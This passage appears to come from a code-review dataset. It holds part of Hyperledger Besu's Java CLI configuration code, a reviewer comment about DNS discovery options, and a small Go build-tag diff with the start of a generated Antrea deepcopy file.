.withKeyStorePath(rpcHttpTlsKeyStoreFile) .withKeyStorePasswordSupplier( new FileBasedPasswordProvider(rpcHttpTlsKeyStorePasswordFile)) .withClientAuthConfiguration(rpcHttpTlsClientAuthConfiguration()) .build()); } private TlsClientAuthConfiguration rpcHttpTlsClientAuthConfiguration() { if (isRpcHttpTlsClientAuthEnabled) { return 
TlsClientAuthConfiguration.Builder.aTlsClientAuthConfiguration() .withKnownClientsFile(rpcHttpTlsKnownClientsFile) .withCaClientsEnabled(isRpcHttpTlsCAClientsEnabled) .build(); } return null; } private boolean isRpcTlsConfigurationRequired() { return isRpcHttpEnabled && isRpcHttpTlsEnabled; } private WebSocketConfiguration webSocketConfiguration() { CommandLineUtils.checkOptionDependencies( logger, commandLine, "--rpc-ws-enabled", !isRpcWsEnabled, asList( "--rpc-ws-api", "--rpc-ws-apis", "--rpc-ws-host", "--rpc-ws-port", "--rpc-ws-max-active-connections", "--rpc-ws-authentication-enabled", "--rpc-ws-authentication-credentials-file", "--rpc-ws-authentication-public-key-file")); if (isRpcWsAuthenticationEnabled && rpcWsAuthenticationCredentialsFile() == null && rpcWsAuthenticationPublicKeyFile == null) { throw new ParameterException( commandLine, "Unable to authenticate JSON-RPC WebSocket endpoint without a supplied credentials file or authentication public key file"); } final WebSocketConfiguration webSocketConfiguration = WebSocketConfiguration.createDefault(); webSocketConfiguration.setEnabled(isRpcWsEnabled); webSocketConfiguration.setHost(rpcWsHost); webSocketConfiguration.setPort(rpcWsPort); webSocketConfiguration.setMaxActiveConnections(rpcWsMaxConnections); webSocketConfiguration.setRpcApis(rpcWsApis); webSocketConfiguration.setAuthenticationEnabled(isRpcWsAuthenticationEnabled); webSocketConfiguration.setAuthenticationCredentialsFile(rpcWsAuthenticationCredentialsFile()); webSocketConfiguration.setHostsAllowlist(hostsAllowlist); webSocketConfiguration.setAuthenticationPublicKeyFile(rpcWsAuthenticationPublicKeyFile); webSocketConfiguration.setTimeoutSec(unstableRPCOptions.getWsTimeoutSec()); return webSocketConfiguration; } private ApiConfiguration apiConfiguration() { return ImmutableApiConfiguration.builder() .gasPriceBlocks(apiGasPriceBlocks) .gasPricePercentile(apiGasPricePercentile) .gasPriceMin(minTransactionGasPrice.toLong()) .gasPriceMax(apiGasPriceMax) .build(); } public MetricsConfiguration metricsConfiguration() { if (isMetricsEnabled && isMetricsPushEnabled) { throw new ParameterException( this.commandLine, "--metrics-enabled option and --metrics-push-enabled option can't be used at the same " + "time. Please refer to CLI reference for more details about this constraint."); } CommandLineUtils.checkOptionDependencies( logger, commandLine, "--metrics-enabled", !isMetricsEnabled, asList("--metrics-host", "--metrics-port")); CommandLineUtils.checkOptionDependencies( logger, commandLine, "--metrics-push-enabled", !isMetricsPushEnabled, asList( "--metrics-push-host", "--metrics-push-port", "--metrics-push-interval", "--metrics-push-prometheus-job")); return unstableMetricsCLIOptions .toDomainObject() .enabled(isMetricsEnabled) .host(metricsHost) .port(metricsPort) .protocol(metricsProtocol) .metricCategories(metricCategories) .pushEnabled(isMetricsPushEnabled) .pushHost(metricsPushHost) .pushPort(metricsPushPort) .pushInterval(metricsPushInterval) .hostsAllowlist(hostsAllowlist) .prometheusJob(metricsPrometheusJob) .build(); } private Optional<PermissioningConfiguration> permissioningConfiguration() throws Exception { if (!(localPermissionsEnabled() || contractPermissionsEnabled())) { if (rpcHttpApis.contains(RpcApis.PERM) || rpcWsApis.contains(RpcApis.PERM)) { logger.warn( "Permissions are disabled. 
Cannot enable PERM APIs when not using Permissions."); } return Optional.empty(); } final Optional<LocalPermissioningConfiguration> localPermissioningConfigurationOptional; if (localPermissionsEnabled()) { final Optional<String> nodePermissioningConfigFile = Optional.ofNullable(nodePermissionsConfigFile); final Optional<String> accountPermissioningConfigFile = Optional.ofNullable(accountPermissionsConfigFile); final LocalPermissioningConfiguration localPermissioningConfiguration = PermissioningConfigurationBuilder.permissioningConfiguration( permissionsNodesEnabled, getEnodeDnsConfiguration(), nodePermissioningConfigFile.orElse(getDefaultPermissioningFilePath()), permissionsAccountsEnabled, accountPermissioningConfigFile.orElse(getDefaultPermissioningFilePath())); localPermissioningConfigurationOptional = Optional.of(localPermissioningConfiguration); } else { if (nodePermissionsConfigFile != null && !permissionsNodesEnabled) { logger.warn( "Node permissioning config file set {} but no permissions enabled", nodePermissionsConfigFile); } if (accountPermissionsConfigFile != null && !permissionsAccountsEnabled) { logger.warn( "Account permissioning config file set {} but no permissions enabled", accountPermissionsConfigFile); } localPermissioningConfigurationOptional = Optional.empty(); } final SmartContractPermissioningConfiguration smartContractPermissioningConfiguration = SmartContractPermissioningConfiguration.createDefault(); if (permissionsNodesContractEnabled) { if (permissionsNodesContractAddress == null) { throw new ParameterException( this.commandLine, "No node permissioning contract address specified. Cannot enable smart contract based node permissioning."); } else { smartContractPermissioningConfiguration.setSmartContractNodeAllowlistEnabled( permissionsNodesContractEnabled); smartContractPermissioningConfiguration.setNodeSmartContractAddress( permissionsNodesContractAddress); smartContractPermissioningConfiguration.setNodeSmartContractInterfaceVersion( permissionsNodesContractVersion); } } else if (permissionsNodesContractAddress != null) { logger.warn( "Node permissioning smart contract address set {} but smart contract node permissioning is disabled.", permissionsNodesContractAddress); } if (permissionsAccountsContractEnabled) { if (permissionsAccountsContractAddress == null) { throw new ParameterException( this.commandLine, "No account permissioning contract address specified. 
Cannot enable smart contract based account permissioning."); } else { smartContractPermissioningConfiguration.setSmartContractAccountAllowlistEnabled( permissionsAccountsContractEnabled); smartContractPermissioningConfiguration.setAccountSmartContractAddress( permissionsAccountsContractAddress); } } else if (permissionsAccountsContractAddress != null) { logger.warn( "Account permissioning smart contract address set {} but smart contract account permissioning is disabled.", permissionsAccountsContractAddress); } final PermissioningConfiguration permissioningConfiguration = new PermissioningConfiguration( localPermissioningConfigurationOptional, Optional.of(smartContractPermissioningConfiguration), quorumPermissioningConfig()); return Optional.of(permissioningConfiguration); } private Optional<GoQuorumPermissioningConfiguration> quorumPermissioningConfig() { if (!isGoQuorumCompatibilityMode) { return Optional.empty(); } try { final GenesisConfigOptions genesisConfigOptions = readGenesisConfigOptions(); final OptionalLong qip714BlockNumber = genesisConfigOptions.getQip714BlockNumber(); return Optional.of( GoQuorumPermissioningConfiguration.enabled( qip714BlockNumber.orElse(QIP714_DEFAULT_BLOCK))); } catch (final Exception e) { throw new IllegalStateException("Error reading GoQuorum permissioning options", e); } } private boolean localPermissionsEnabled() { return permissionsAccountsEnabled || permissionsNodesEnabled; } private boolean contractPermissionsEnabled() { return permissionsNodesContractEnabled || permissionsAccountsContractEnabled; } private PrivacyParameters privacyParameters(final KeyValueStorageProvider storageProvider) { CommandLineUtils.checkOptionDependencies( logger, commandLine, "--privacy-enabled", !isPrivacyEnabled, asList("--privacy-multi-tenancy-enabled", "--privacy-tls-enabled")); CommandLineUtils.checkMultiOptionDependencies( logger, commandLine, List.of("--privacy-enabled", "--goquorum-compatibility-enabled"), List.of(!isPrivacyEnabled, !isGoQuorumCompatibilityMode), List.of("--privacy-url", "--privacy-public-key-file")); checkPrivacyTlsOptionsDependencies(); final PrivacyParameters.Builder privacyParametersBuilder = new PrivacyParameters.Builder(); if (isPrivacyEnabled) { final String errorSuffix = "cannot be enabled with privacy."; if (syncMode == SyncMode.FAST) { throw new ParameterException(commandLine, String.format("%s %s", "Fast sync", errorSuffix)); } if (isPruningEnabled()) { throw new ParameterException(commandLine, String.format("%s %s", "Pruning", errorSuffix)); } if (isGoQuorumCompatibilityMode) { throw new ParameterException( commandLine, String.format("%s %s", "GoQuorum mode", errorSuffix)); } if (isPrivacyMultiTenancyEnabled && !jsonRpcConfiguration.isAuthenticationEnabled() && !webSocketConfiguration.isAuthenticationEnabled()) { throw new ParameterException( commandLine, "Privacy multi-tenancy requires either http authentication to be enabled or WebSocket authentication to be enabled"); } privacyParametersBuilder.setEnabled(true); privacyParametersBuilder.setEnclaveUrl(privacyUrl); privacyParametersBuilder.setMultiTenancyEnabled(isPrivacyMultiTenancyEnabled); privacyParametersBuilder.setOnchainPrivacyGroupsEnabled(isFlexiblePrivacyGroupsEnabled); final boolean hasPrivacyPublicKey = privacyPublicKeyFile != null; if (hasPrivacyPublicKey && !isPrivacyMultiTenancyEnabled) { try { privacyParametersBuilder.setEnclavePublicKeyUsingFile(privacyPublicKeyFile); } catch (final IOException e) { throw new ParameterException( commandLine, "Problem with 
privacy-public-key-file: " + e.getMessage(), e); } catch (final IllegalArgumentException e) { throw new ParameterException( commandLine, "Contents of privacy-public-key-file invalid: " + e.getMessage(), e); } } else if (hasPrivacyPublicKey) { throw new ParameterException( commandLine, "Privacy multi-tenancy and privacy public key cannot be used together"); } else if (!isPrivacyMultiTenancyEnabled) { throw new ParameterException( commandLine, "Please specify Enclave public key file path to enable privacy"); } if (Wei.ZERO.compareTo(minTransactionGasPrice) < 0) { // if gas is required, cannot use random keys to sign private tx // ie --privacy-marker-transaction-signing-key-file must be set if (privacyMarkerTransactionSigningKeyPath == null) { throw new ParameterException( commandLine, "Not a free gas network. --privacy-marker-transaction-signing-key-file must be specified and must be a funded account. Private transactions cannot be signed by random (non-funded) accounts in paid gas networks"); } } if (!Address.PRIVACY.equals(privacyPrecompiledAddress)) { logger.warn( "--privacy-precompiled-address option is deprecated. This address is derived, based on --privacy-onchain-groups-enabled."); } privacyParametersBuilder.setPrivateKeyPath(privacyMarkerTransactionSigningKeyPath); privacyParametersBuilder.setStorageProvider( privacyKeyStorageProvider(keyValueStorageName + "-privacy")); if (isPrivacyTlsEnabled) { privacyParametersBuilder.setPrivacyKeyStoreFile(privacyKeyStoreFile); privacyParametersBuilder.setPrivacyKeyStorePasswordFile(privacyKeyStorePasswordFile); privacyParametersBuilder.setPrivacyTlsKnownEnclaveFile(privacyTlsKnownEnclaveFile); } privacyParametersBuilder.setEnclaveFactory(new EnclaveFactory(vertx)); } else if (isGoQuorumCompatibilityMode) { privacyParametersBuilder.setGoQuorumPrivacyParameters( Optional.of(configureGoQuorumPrivacy(storageProvider))); } if (!isPrivacyEnabled && anyPrivacyApiEnabled()) { logger.warn("Privacy is disabled. 
Cannot use EEA/PRIV API methods when not using Privacy."); } if (!isGoQuorumCompatibilityMode && (rpcHttpApis.contains(RpcApis.GOQUORUM) || rpcWsApis.contains(RpcApis.GOQUORUM))) { logger.warn("Cannot use GOQUORUM API methods when not in GoQuorum mode."); } final PrivacyParameters privacyParameters = privacyParametersBuilder.build(); if (isPrivacyEnabled) { preSynchronizationTaskRunner.addTask( new PrivateDatabaseMigrationPreSyncTask(privacyParameters, migratePrivateDatabase)); } return privacyParameters; } public WorldStateArchive createPrivateWorldStateArchive(final StorageProvider storageProvider) { final WorldStateStorage privateWorldStateStorage = storageProvider.createPrivateWorldStateStorage(); final WorldStatePreimageStorage preimageStorage = storageProvider.createPrivateWorldStatePreimageStorage(); return new DefaultWorldStateArchive(privateWorldStateStorage, preimageStorage); } private boolean anyPrivacyApiEnabled() { return rpcHttpApis.contains(RpcApis.EEA) || rpcWsApis.contains(RpcApis.EEA) || rpcHttpApis.contains(RpcApis.PRIV) || rpcWsApis.contains(RpcApis.PRIV); } private PrivacyKeyValueStorageProvider privacyKeyStorageProvider(final String name) { return new PrivacyKeyValueStorageProviderBuilder() .withStorageFactory(privacyKeyValueStorageFactory(name)) .withCommonConfiguration(pluginCommonConfiguration) .withMetricsSystem(getMetricsSystem()) .build(); } private PrivacyKeyValueStorageFactory privacyKeyValueStorageFactory(final String name) { return (PrivacyKeyValueStorageFactory) storageService .getByName(name) .orElseThrow( () -> new StorageException("No KeyValueStorageFactory found for key: " + name)); } private KeyValueStorageProvider keyValueStorageProvider(final String name) { if (this.keyValueStorageProvider == null) { this.keyValueStorageProvider = new KeyValueStorageProviderBuilder() .withStorageFactory( storageService .getByName(name) .orElseThrow( () -> new StorageException( "No KeyValueStorageFactory found for key: " + name))) .withCommonConfiguration(pluginCommonConfiguration) .withMetricsSystem(getMetricsSystem()) .build(); } return this.keyValueStorageProvider; } private SynchronizerConfiguration buildSyncConfig() { return unstableSynchronizerOptions .toDomainObject() .syncMode(syncMode) .fastSyncMinimumPeerCount(fastSyncMinPeerCount) .build(); } private TransactionPoolConfiguration buildTransactionPoolConfiguration() { return unstableTransactionPoolOptions .toDomainObject() .txPoolMaxSize(txPoolMaxSize) .pooledTransactionHashesSize(pooledTransactionHashesSize) .pendingTxRetentionPeriod(pendingTxRetentionPeriod) .priceBump(Percentage.fromInt(priceBump)) .txFeeCap(txFeeCap) .build(); } private boolean isPruningEnabled() { return pruningEnabled; } // Blockchain synchronisation from peers. 
private void synchronize( final BesuController controller, final boolean p2pEnabled, final boolean peerDiscoveryEnabled, final EthNetworkConfig ethNetworkConfig, final int maxPeers, final String p2pAdvertisedHost, final String p2pListenInterface, final int p2pListenPort, final GraphQLConfiguration graphQLConfiguration, final JsonRpcConfiguration jsonRpcConfiguration, final WebSocketConfiguration webSocketConfiguration, final ApiConfiguration apiConfiguration, final MetricsConfiguration metricsConfiguration, final Optional<PermissioningConfiguration> permissioningConfiguration, final Collection<EnodeURL> staticNodes, final Path pidPath) { checkNotNull(runnerBuilder); permissioningConfiguration.ifPresent(runnerBuilder::permissioningConfiguration); final ObservableMetricsSystem metricsSystem = this.metricsSystem.get(); final Runner runner = runnerBuilder .vertx(vertx) .besuController(controller) .p2pEnabled(p2pEnabled) .natMethod(natMethod) .natManagerServiceName(unstableNatOptions.getNatManagerServiceName()) .natMethodFallbackEnabled(unstableNatOptions.getNatMethodFallbackEnabled()) .discovery(peerDiscoveryEnabled) .ethNetworkConfig(ethNetworkConfig) .p2pAdvertisedHost(p2pAdvertisedHost) .p2pListenInterface(p2pListenInterface) .p2pListenPort(p2pListenPort) .maxPeers(maxPeers) .limitRemoteWireConnectionsEnabled(isLimitRemoteWireConnectionsEnabled) .fractionRemoteConnectionsAllowed( Fraction.fromPercentage(maxRemoteConnectionsPercentage).getValue()) .randomPeerPriority(randomPeerPriority) .networkingConfiguration(unstableNetworkingOptions.toDomainObject()) .graphQLConfiguration(graphQLConfiguration) .jsonRpcConfiguration(jsonRpcConfiguration) .webSocketConfiguration(webSocketConfiguration) .apiConfiguration(apiConfiguration) .pidPath(pidPath) .dataDir(dataDir()) .bannedNodeIds(bannedNodeIds) .metricsSystem(metricsSystem) .metricsConfiguration(metricsConfiguration) .staticNodes(staticNodes) .identityString(identityString) .besuPluginContext(besuPluginContext) .autoLogBloomCaching(autoLogBloomCachingEnabled) .ethstatsUrl(unstableEthstatsOptions.getEthstatsUrl()) .ethstatsContact(unstableEthstatsOptions.getEthstatsContact()) .storageProvider(keyValueStorageProvider(keyValueStorageName)) .forkIdSupplier(() -> besuController.getProtocolManager().getForkIdAsBytesList()) .build(); addShutdownHook(runner); runner.start(); runner.awaitStop(); } protected Vertx createVertx(final VertxOptions vertxOptions) { return Vertx.vertx(vertxOptions); } private VertxOptions createVertxOptions(final MetricsSystem metricsSystem) { return new VertxOptions() .setMetricsOptions( new MetricsOptions() .setEnabled(true) .setFactory(new VertxMetricsAdapterFactory(metricsSystem))); } private void addShutdownHook(final Runner runner) { Runtime.getRuntime() .addShutdownHook( new Thread( () -> { try { besuPluginContext.stopPlugins(); runner.close(); LogManager.shutdown(); } catch (final Exception e) { logger.error("Failed to stop Besu"); } })); } // Used to discover the default IP of the client. // Loopback IP is used by default as this is how smokeTests require it to be // and it's probably a good security behaviour to default only on the localhost. 
private InetAddress autoDiscoverDefaultIP() { if (autoDiscoveredDefaultIP != null) { return autoDiscoveredDefaultIP; } autoDiscoveredDefaultIP = InetAddress.getLoopbackAddress(); return autoDiscoveredDefaultIP; } private EthNetworkConfig updateNetworkConfig(final NetworkName network) { final EthNetworkConfig.Builder builder = new EthNetworkConfig.Builder(EthNetworkConfig.getNetworkConfig(network)); // custom genesis file use comes with specific default values for the genesis // file itself // but also for the network id and the bootnodes list. if (genesisFile != null) { // noinspection ConstantConditions network is not always null but injected by // PicoCLI if used if (this.network != null) { // We check if network option was really provided by user and not only looking // at the // default value. // if user provided it and provided the genesis file option at the same time, it // raises a // conflict error throw new ParameterException( this.commandLine, "--network option and --genesis-file option can't be used at the same time. Please " + "refer to CLI reference for more details about this constraint."); } builder.setGenesisConfig(genesisConfig()); if (networkId == null) { // if no network id option is defined on the CLI we have to set a default value // from the // genesis file. // We do the genesis parsing only in this case as we already have network id // constants // for known networks to speed up the process. // Also we have to parse the genesis as we don't already have a parsed version // at this // stage. // If no chain id is found in the genesis as it's an optional, we use mainnet // network id. try { builder.setNetworkId( getGenesisConfigFile() .getConfigOptions(genesisConfigOverrides) .getChainId() .orElse(EthNetworkConfig.getNetworkConfig(MAINNET).getNetworkId())); } catch (final DecodeException e) { throw new ParameterException( this.commandLine, String.format("Unable to parse genesis file %s.", genesisFile), e); } catch (final ArithmeticException e) { throw new ParameterException( this.commandLine, "No networkId specified and chainId in " + "genesis file is too large to be used as a networkId"); } } if (bootNodes == null) { // We default to an empty bootnodes list if the option is not provided on CLI // because // mainnet bootnodes won't work as the default value for a custom genesis, // so it's better to have an empty list as default value that forces to create a // custom one // than a useless one that may make user think that it can work when it can't. 
builder.setBootNodes(new ArrayList<>()); } builder.setDnsDiscoveryUrl(null); } if (networkId != null) { builder.setNetworkId(networkId); } if (bootNodes != null) { if (!peerDiscoveryEnabled) { logger.warn("Discovery disabled: bootnodes will be ignored."); } try { final List<EnodeURL> listBootNodes = bootNodes.stream() .filter(value -> !value.isEmpty()) .map(url -> EnodeURL.fromString(url, getEnodeDnsConfiguration())) .collect(Collectors.toList()); DiscoveryConfiguration.assertValidBootnodes(listBootNodes); builder.setBootNodes(listBootNodes); } catch (final IllegalArgumentException e) { throw new ParameterException(commandLine, e.getMessage()); } } return builder.build(); } private GenesisConfigFile getGenesisConfigFile() { return GenesisConfigFile.fromConfig(genesisConfig()); } private String genesisConfig() { try { return Resources.toString(genesisFile.toURI().toURL(), UTF_8); } catch (final IOException e) { throw new ParameterException( this.commandLine, String.format("Unable to load genesis file %s.", genesisFile), e); } } // dataDir() is public because it is accessed by subcommands public Path dataDir() { return dataPath.toAbsolutePath(); } private Path pluginsDir() { final String pluginsDir = System.getProperty("besu.plugins.dir"); if (pluginsDir == null) { return new File(System.getProperty("besu.home", "."), "plugins").toPath(); } else { return new File(pluginsDir).toPath(); } } @VisibleForTesting NodeKey buildNodeKey() { return new NodeKey(securityModule()); } private SecurityModule securityModule() { return securityModuleService .getByName(securityModuleName) .orElseThrow(() -> new RuntimeException("Security Module not found: " + securityModuleName)) .get(); } private File nodePrivateKeyFile() { return Optional.ofNullable(nodePrivateKeyFile) .orElseGet(() -> KeyPairUtil.getDefaultKeyFile(dataDir())); } private String rpcHttpAuthenticationCredentialsFile() { final String filename = rpcHttpAuthenticationCredentialsFile; if (filename != null) { RpcAuthFileValidator.validate(commandLine, filename, "HTTP"); } return filename; } private String rpcWsAuthenticationCredentialsFile() { final String filename = rpcWsAuthenticationCredentialsFile; if (filename != null) { RpcAuthFileValidator.validate(commandLine, filename, "WS"); } return filename; } private String getDefaultPermissioningFilePath() { return dataDir() + System.getProperty("file.separator") + DefaultCommandValues.PERMISSIONING_CONFIG_LOCATION; } public MetricsSystem getMetricsSystem() { return metricsSystem.get(); } private Set<EnodeURL> loadStaticNodes() throws IOException { final Path staticNodesPath; if (staticNodesFile != null) { staticNodesPath = staticNodesFile.toAbsolutePath(); if (!staticNodesPath.toFile().exists()) { throw new ParameterException( commandLine, String.format("Static nodes file %s does not exist", staticNodesPath)); } } else { final String staticNodesFilename = "static-nodes.json"; staticNodesPath = dataDir().resolve(staticNodesFilename); } logger.info("Static Nodes file = {}", staticNodesPath); return StaticNodesParser.fromPath(staticNodesPath, getEnodeDnsConfiguration()); } public BesuExceptionHandler exceptionHandler() { return new BesuExceptionHandler(this::getLogLevel); } public EnodeDnsConfiguration getEnodeDnsConfiguration() { if (enodeDnsConfiguration == null) { enodeDnsConfiguration = unstableDnsOptions.toDomainObject(); } return enodeDnsConfiguration; } private void checkPortClash() { getEffectivePorts().stream() .filter(Objects::nonNull) .filter(port -> port > 0) .forEach( port -> { if 
(!allocatedPorts.add(port)) { throw new ParameterException( commandLine, "Port number '" + port + "' has been specified multiple times. Please review the supplied configuration."); } }); } /** * * Gets the list of effective ports (ports that are enabled). * * @return The list of effective ports */ private List<Integer> getEffectivePorts() { final List<Integer> effectivePorts = new ArrayList<>(); addPortIfEnabled(effectivePorts, p2pPort, p2pEnabled); addPortIfEnabled(effectivePorts, graphQLHttpPort, isGraphQLHttpEnabled); addPortIfEnabled(effectivePorts, rpcHttpPort, isRpcHttpEnabled); addPortIfEnabled(effectivePorts, rpcWsPort, isRpcWsEnabled); addPortIfEnabled(effectivePorts, metricsPort, isMetricsEnabled); addPortIfEnabled(effectivePorts, metricsPushPort, isMetricsPushEnabled); addPortIfEnabled(effectivePorts, stratumPort, iStratumMiningEnabled); return effectivePorts; } /** * Adds port in the passed list only if enabled. * * @param ports The list of ports * @param port The port value * @param enabled true if enabled, false otherwise */ private void addPortIfEnabled( final List<Integer> ports, final Integer port, final boolean enabled) { if (enabled) { ports.add(port); } } private void checkGoQuorumGenesisConfig() { if (genesisFile != null) { if (readGenesisConfigOptions().isQuorum() && !isGoQuorumCompatibilityMode) { throw new IllegalStateException( "Cannot use GoQuorum genesis file without GoQuorum privacy enabled"); } } } private void checkGoQuorumCompatibilityConfig(final EthNetworkConfig ethNetworkConfig) { if (isGoQuorumCompatibilityMode) { if (genesisFile == null) { throw new ParameterException( this.commandLine, "--genesis-file must be specified if GoQuorum compatibility mode is enabled."); } final GenesisConfigOptions genesisConfigOptions = readGenesisConfigOptions(); // this static flag is read by the RLP decoder GoQuorumOptions.goQuorumCompatibilityMode = true; if (!genesisConfigOptions.isQuorum()) { throw new IllegalStateException( "GoQuorum compatibility mode (enabled) can only be used if genesis file has 'isQuorum' flag set to true."); } if (!minTransactionGasPrice.isZero()) { throw new ParameterException( this.commandLine, "--min-gas-price must be set to zero if GoQuorum compatibility is enabled in the genesis config."); } if (ensureGoQuorumCompatibilityModeNotUsedOnMainnet(genesisConfigOptions, ethNetworkConfig)) { throw new ParameterException( this.commandLine, "GoQuorum compatibility mode (enabled) cannot be used on Mainnet."); } } } private static boolean ensureGoQuorumCompatibilityModeNotUsedOnMainnet( final GenesisConfigOptions genesisConfigOptions, final EthNetworkConfig ethNetworkConfig) { return ethNetworkConfig.getNetworkId().equals(EthNetworkConfig.MAINNET_NETWORK_ID) || genesisConfigOptions .getChainId() .map(chainId -> chainId.equals(EthNetworkConfig.MAINNET_NETWORK_ID)) .orElse(false); } @VisibleForTesting Level getLogLevel() { return logLevel; } private class BesuCommandConfigurationService implements BesuConfiguration { @Override public Path getStoragePath() { return dataDir().resolve(DATABASE_PATH); } @Override public Path getDataPath() { return dataDir(); } @Override public int getDatabaseVersion() { return unstableDataStorageOptions .toDomainObject() .getDataStorageFormat() .getDatabaseVersion(); } } private void instantiateSignatureAlgorithmFactory() { if (SignatureAlgorithmFactory.isInstanceSet()) { return; } Optional<String> ecCurve = getEcCurveFromGenesisFile(); if (ecCurve.isEmpty()) { SignatureAlgorithmFactory.setDefaultInstance(); return; } try { 
SignatureAlgorithmFactory.setInstance(SignatureAlgorithmType.create(ecCurve.get())); } catch (IllegalArgumentException e) { throw new CommandLine.InitializationException(e.getMessage()); } } private Optional<String> getEcCurveFromGenesisFile() { if (genesisFile == null) { return Optional.empty(); } GenesisConfigOptions options = readGenesisConfigOptions(); return options.getEcCurve(); } }
1
24,919
Hmm... this feels like discovery should come first. Perhaps `--discovery-dns-url`? @NicolasMassart, any opinions on this, or ideas on who it should be run by?
hyperledger-besu
java
@@ -1,3 +1,4 @@ +//go:build !ignore_autogenerated // +build !ignore_autogenerated /*
1
// +build !ignore_autogenerated /* Copyright 2021 Antrea Authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ // Code generated by controller-gen. DO NOT EDIT. package v1alpha1 import ( "antrea.io/antrea/pkg/apis/crd/v1alpha2" "k8s.io/api/core/v1" "k8s.io/apimachinery/pkg/runtime" apisv1alpha1 "sigs.k8s.io/mcs-api/pkg/apis/v1alpha1" ) // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ClusterClaim) DeepCopyInto(out *ClusterClaim) { *out = *in out.TypeMeta = in.TypeMeta in.ObjectMeta.DeepCopyInto(&out.ObjectMeta) } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ClusterClaim. func (in *ClusterClaim) DeepCopy() *ClusterClaim { if in == nil { return nil } out := new(ClusterClaim) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *ClusterClaim) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ClusterClaimList) DeepCopyInto(out *ClusterClaimList) { *out = *in out.TypeMeta = in.TypeMeta in.ListMeta.DeepCopyInto(&out.ListMeta) if in.Items != nil { in, out := &in.Items, &out.Items *out = make([]ClusterClaim, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ClusterClaimList. func (in *ClusterClaimList) DeepCopy() *ClusterClaimList { if in == nil { return nil } out := new(ClusterClaimList) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *ClusterClaimList) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ClusterCondition) DeepCopyInto(out *ClusterCondition) { *out = *in in.LastTransitionTime.DeepCopyInto(&out.LastTransitionTime) } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ClusterCondition. func (in *ClusterCondition) DeepCopy() *ClusterCondition { if in == nil { return nil } out := new(ClusterCondition) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ClusterSet) DeepCopyInto(out *ClusterSet) { *out = *in out.TypeMeta = in.TypeMeta in.ObjectMeta.DeepCopyInto(&out.ObjectMeta) in.Spec.DeepCopyInto(&out.Spec) in.Status.DeepCopyInto(&out.Status) } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ClusterSet. 
func (in *ClusterSet) DeepCopy() *ClusterSet { if in == nil { return nil } out := new(ClusterSet) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *ClusterSet) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ClusterSetCondition) DeepCopyInto(out *ClusterSetCondition) { *out = *in in.LastTransitionTime.DeepCopyInto(&out.LastTransitionTime) } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ClusterSetCondition. func (in *ClusterSetCondition) DeepCopy() *ClusterSetCondition { if in == nil { return nil } out := new(ClusterSetCondition) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ClusterSetList) DeepCopyInto(out *ClusterSetList) { *out = *in out.TypeMeta = in.TypeMeta in.ListMeta.DeepCopyInto(&out.ListMeta) if in.Items != nil { in, out := &in.Items, &out.Items *out = make([]ClusterSet, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ClusterSetList. func (in *ClusterSetList) DeepCopy() *ClusterSetList { if in == nil { return nil } out := new(ClusterSetList) in.DeepCopyInto(out) return out } // DeepCopyObject is an autogenerated deepcopy function, copying the receiver, creating a new runtime.Object. func (in *ClusterSetList) DeepCopyObject() runtime.Object { if c := in.DeepCopy(); c != nil { return c } return nil } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ClusterSetSpec) DeepCopyInto(out *ClusterSetSpec) { *out = *in if in.Members != nil { in, out := &in.Members, &out.Members *out = make([]MemberCluster, len(*in)) copy(*out, *in) } if in.Leaders != nil { in, out := &in.Leaders, &out.Leaders *out = make([]MemberCluster, len(*in)) copy(*out, *in) } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ClusterSetSpec. func (in *ClusterSetSpec) DeepCopy() *ClusterSetSpec { if in == nil { return nil } out := new(ClusterSetSpec) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, copying the receiver, writing into out. in must be non-nil. func (in *ClusterSetStatus) DeepCopyInto(out *ClusterSetStatus) { *out = *in if in.Conditions != nil { in, out := &in.Conditions, &out.Conditions *out = make([]ClusterSetCondition, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } if in.ClusterStatuses != nil { in, out := &in.ClusterStatuses, &out.ClusterStatuses *out = make([]ClusterStatus, len(*in)) for i := range *in { (*in)[i].DeepCopyInto(&(*out)[i]) } } } // DeepCopy is an autogenerated deepcopy function, copying the receiver, creating a new ClusterSetStatus. func (in *ClusterSetStatus) DeepCopy() *ClusterSetStatus { if in == nil { return nil } out := new(ClusterSetStatus) in.DeepCopyInto(out) return out } // DeepCopyInto is an autogenerated deepcopy function, 